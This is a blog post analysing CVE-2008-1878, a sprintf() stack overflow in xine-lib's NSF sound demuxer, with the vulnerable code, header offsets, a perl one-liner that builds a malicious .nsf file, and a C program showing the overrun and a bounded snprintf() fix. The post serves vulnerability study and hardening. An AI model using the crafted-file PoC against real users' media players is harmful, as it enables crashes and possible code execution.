xorl %eax, %eax

CVE-2008-1878: xine-lib NES Sound Format Demuxer Buffer Overflow


Now, I’m listening to Godsmack – Re-Align and decided to post some more notes on a straightforward vulnerability in xine-lib up to 1.1.12. The bug is in the NES (Nintendo Entertainment System) sound format demuxer, src/demuxers/demux_nsf.c, and the interesting part is demux_nsf_send_chunk() (lines 118-163 of that file):

   static int demux_nsf_send_chunk(demux_plugin_t *this_gen) {
     demux_nsf_t *this = (demux_nsf_t *) this_gen;
     buf_element_t *buf;
     int bytes_read;
     char title[100];
               ...
      if (this->new_song) {

        buf->decoder_info[1] = this->current_song;
        this->new_song = 0;
        sprintf(title, "%s, song %d/%d",
          this->title, this->current_song, this->total_songs);


Yeap, now it’s time to laugh like crazy… an sprintf() overflow! The format string "%s, song %d/%d" is expanded into the 100-byte stack buffer title with no length check at all, and this->title comes straight from the file. To craft a malicious .nsf file you have to understand the structure of the NSF header. Here is the signature check performed while opening the file, in open_nsf_file() (lines 100-106):

   /* check for the signature */
   if ((header[0] != 'N') ||
       (header[1] != 'E') ||
       (header[2] != 'S') ||
       (header[3] != 'M') ||
       (header[4] != 0x1A))
   return 0;


As you can see in the first snippet, title is a 100-byte stack buffer and the string copied into it, this->title, is user controlled. The header has to start with "NESM" followed by 0x1A and is 128 bytes long; the title string begins at offset 0x0E (right after the 14 bytes of signature, version, song counts and the three 16-bit load/init/play addresses), so in the PoC below the 114 bytes of 'X' that fill the rest of the header become the title. Since ", song 1/1" plus the terminating NUL already takes 11 bytes, any title longer than 89 bytes overflows. Yeah, that’s all… Here is a simple proof of concept for this vulnerability as initially demonstrated by Guido Landi:

sh-3.2$ perl -e 'print "NESM" . "\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A" . "X" x 114' > file.nsf
sh-3.2$
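As an added example (this is neither xorl's code nor xine-lib's), here is a small C program that builds the same 128-byte header as the perl one-liner above, parses it the way the demuxer's signature check does, and measures what the unbounded sprintf() would write into title[100] next to a bounded snprintf() replacement, without actually smashing any stack. The field offsets (song counts at 6 and 7, title at 0x0E) follow the NSF header layout; the struct name, the helper names and the bounded copy of the title are assumptions made for this example, not xine-lib's own code.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* NSF header layout (NSF format spec): 128 bytes, "NESM\x1A" at offset 0,
 * total/starting song at 6/7, title string at 0x0E. */
#define NSF_HEADER_SIZE   0x80
#define NSF_TITLE_OFFSET  0x0E
#define TITLE_BUF_SIZE    100   /* size of the local title[] in demux_nsf_send_chunk() */

/* Example-only struct; xine-lib's demux_nsf_t has more fields than this. */
typedef struct {
    int total_songs;
    int current_song;
    char *title;   /* heap copy of the title taken from the file header */
} nsf_info_t;

/* Signature check equivalent to the one in open_nsf_file(). */
static int nsf_check_signature(const unsigned char *header)
{
    return header[0] == 'N' && header[1] == 'E' && header[2] == 'S' &&
           header[3] == 'M' && header[4] == 0x1A;
}

/* Copy at most `max` bytes up to the first NUL. The PoC never NUL-terminates
 * the title, so an unbounded strdup() of the header would read past it. */
static char *bounded_strdup(const unsigned char *p, size_t max)
{
    size_t n = 0;
    char *s;
    while (n < max && p[n] != '\0')
        n++;
    s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memcpy(s, p, n);
    s[n] = '\0';
    return s;
}

/* Parse the header fields the demuxer uses. Returns 1 on success. */
static int nsf_parse_header(const unsigned char *header, size_t len, nsf_info_t *out)
{
    if (len < NSF_HEADER_SIZE || !nsf_check_signature(header))
        return 0;
    out->total_songs  = header[6];
    out->current_song = header[7];
    out->title = bounded_strdup(header + NSF_TITLE_OFFSET,
                                NSF_HEADER_SIZE - NSF_TITLE_OFFSET);
    return out->title != NULL;
}

/* Bytes (excluding the NUL) that the original sprintf(title, "%s, song %d/%d", ...)
 * would write; anything >= TITLE_BUF_SIZE smashes the stack frame. */
static int vulnerable_title_length(const nsf_info_t *info)
{
    return snprintf(NULL, 0, "%s, song %d/%d",
                    info->title, info->current_song, info->total_songs);
}

/* Hardened replacement: bounded write, always NUL-terminated.
 * Returns 1 if the output had to be truncated. */
static int format_title_safe(char *dst, size_t dst_size, const nsf_info_t *info)
{
    int needed = snprintf(dst, dst_size, "%s, song %d/%d",
                          info->title, info->current_song, info->total_songs);
    return needed < 0 || (size_t)needed >= dst_size;
}

/* Same 128 bytes as the perl one-liner: 14-byte prefix, then 'X' to the end. */
static size_t build_poc_header(unsigned char *buf, size_t len)
{
    static const unsigned char prefix[] = "NESM\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A";
    size_t plen = sizeof prefix - 1;   /* 14 bytes, up to NSF_TITLE_OFFSET */
    if (len < NSF_HEADER_SIZE)
        return 0;
    memcpy(buf, prefix, plen);
    memset(buf + plen, 'X', NSF_HEADER_SIZE - plen);
    return NSF_HEADER_SIZE;
}

/* End-to-end on the PoC: what the vulnerable sprintf() would write, or -1 on error. */
static int poc_vulnerable_length(void)
{
    unsigned char hdr[NSF_HEADER_SIZE];
    nsf_info_t info;
    int n;
    if (!build_poc_header(hdr, sizeof hdr) || !nsf_parse_header(hdr, sizeof hdr, &info))
        return -1;
    n = vulnerable_title_length(&info);
    free(info.title);
    return n;
}

/* End-to-end with the hardened formatter: 1 if it truncated into a 100-byte buffer. */
static int poc_safe_truncated(void)
{
    unsigned char hdr[NSF_HEADER_SIZE];
    char out[TITLE_BUF_SIZE];
    nsf_info_t info;
    int truncated;
    if (!build_poc_header(hdr, sizeof hdr) || !nsf_parse_header(hdr, sizeof hdr, &info))
        return -1;
    truncated = format_title_safe(out, sizeof out, &info) && strlen(out) == TITLE_BUF_SIZE - 1;
    free(info.title);
    return truncated;
}

int main(void)
{
    printf("vulnerable sprintf() would write %d+1 bytes into title[%d]\n",
           poc_vulnerable_length(), TITLE_BUF_SIZE);
    printf("hardened snprintf() truncated: %d\n", poc_safe_truncated());
    return 0;
}
```

With the PoC header the title is 114 bytes of 'X' and the suffix is ", song 1/1", so the original sprintf() would write 124 bytes plus a NUL into a 100-byte frame; the bounded version writes 99 characters and a NUL and reports the truncation instead.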

Written by xorl

January 1, 2009 at 14:33

Posted in bugs
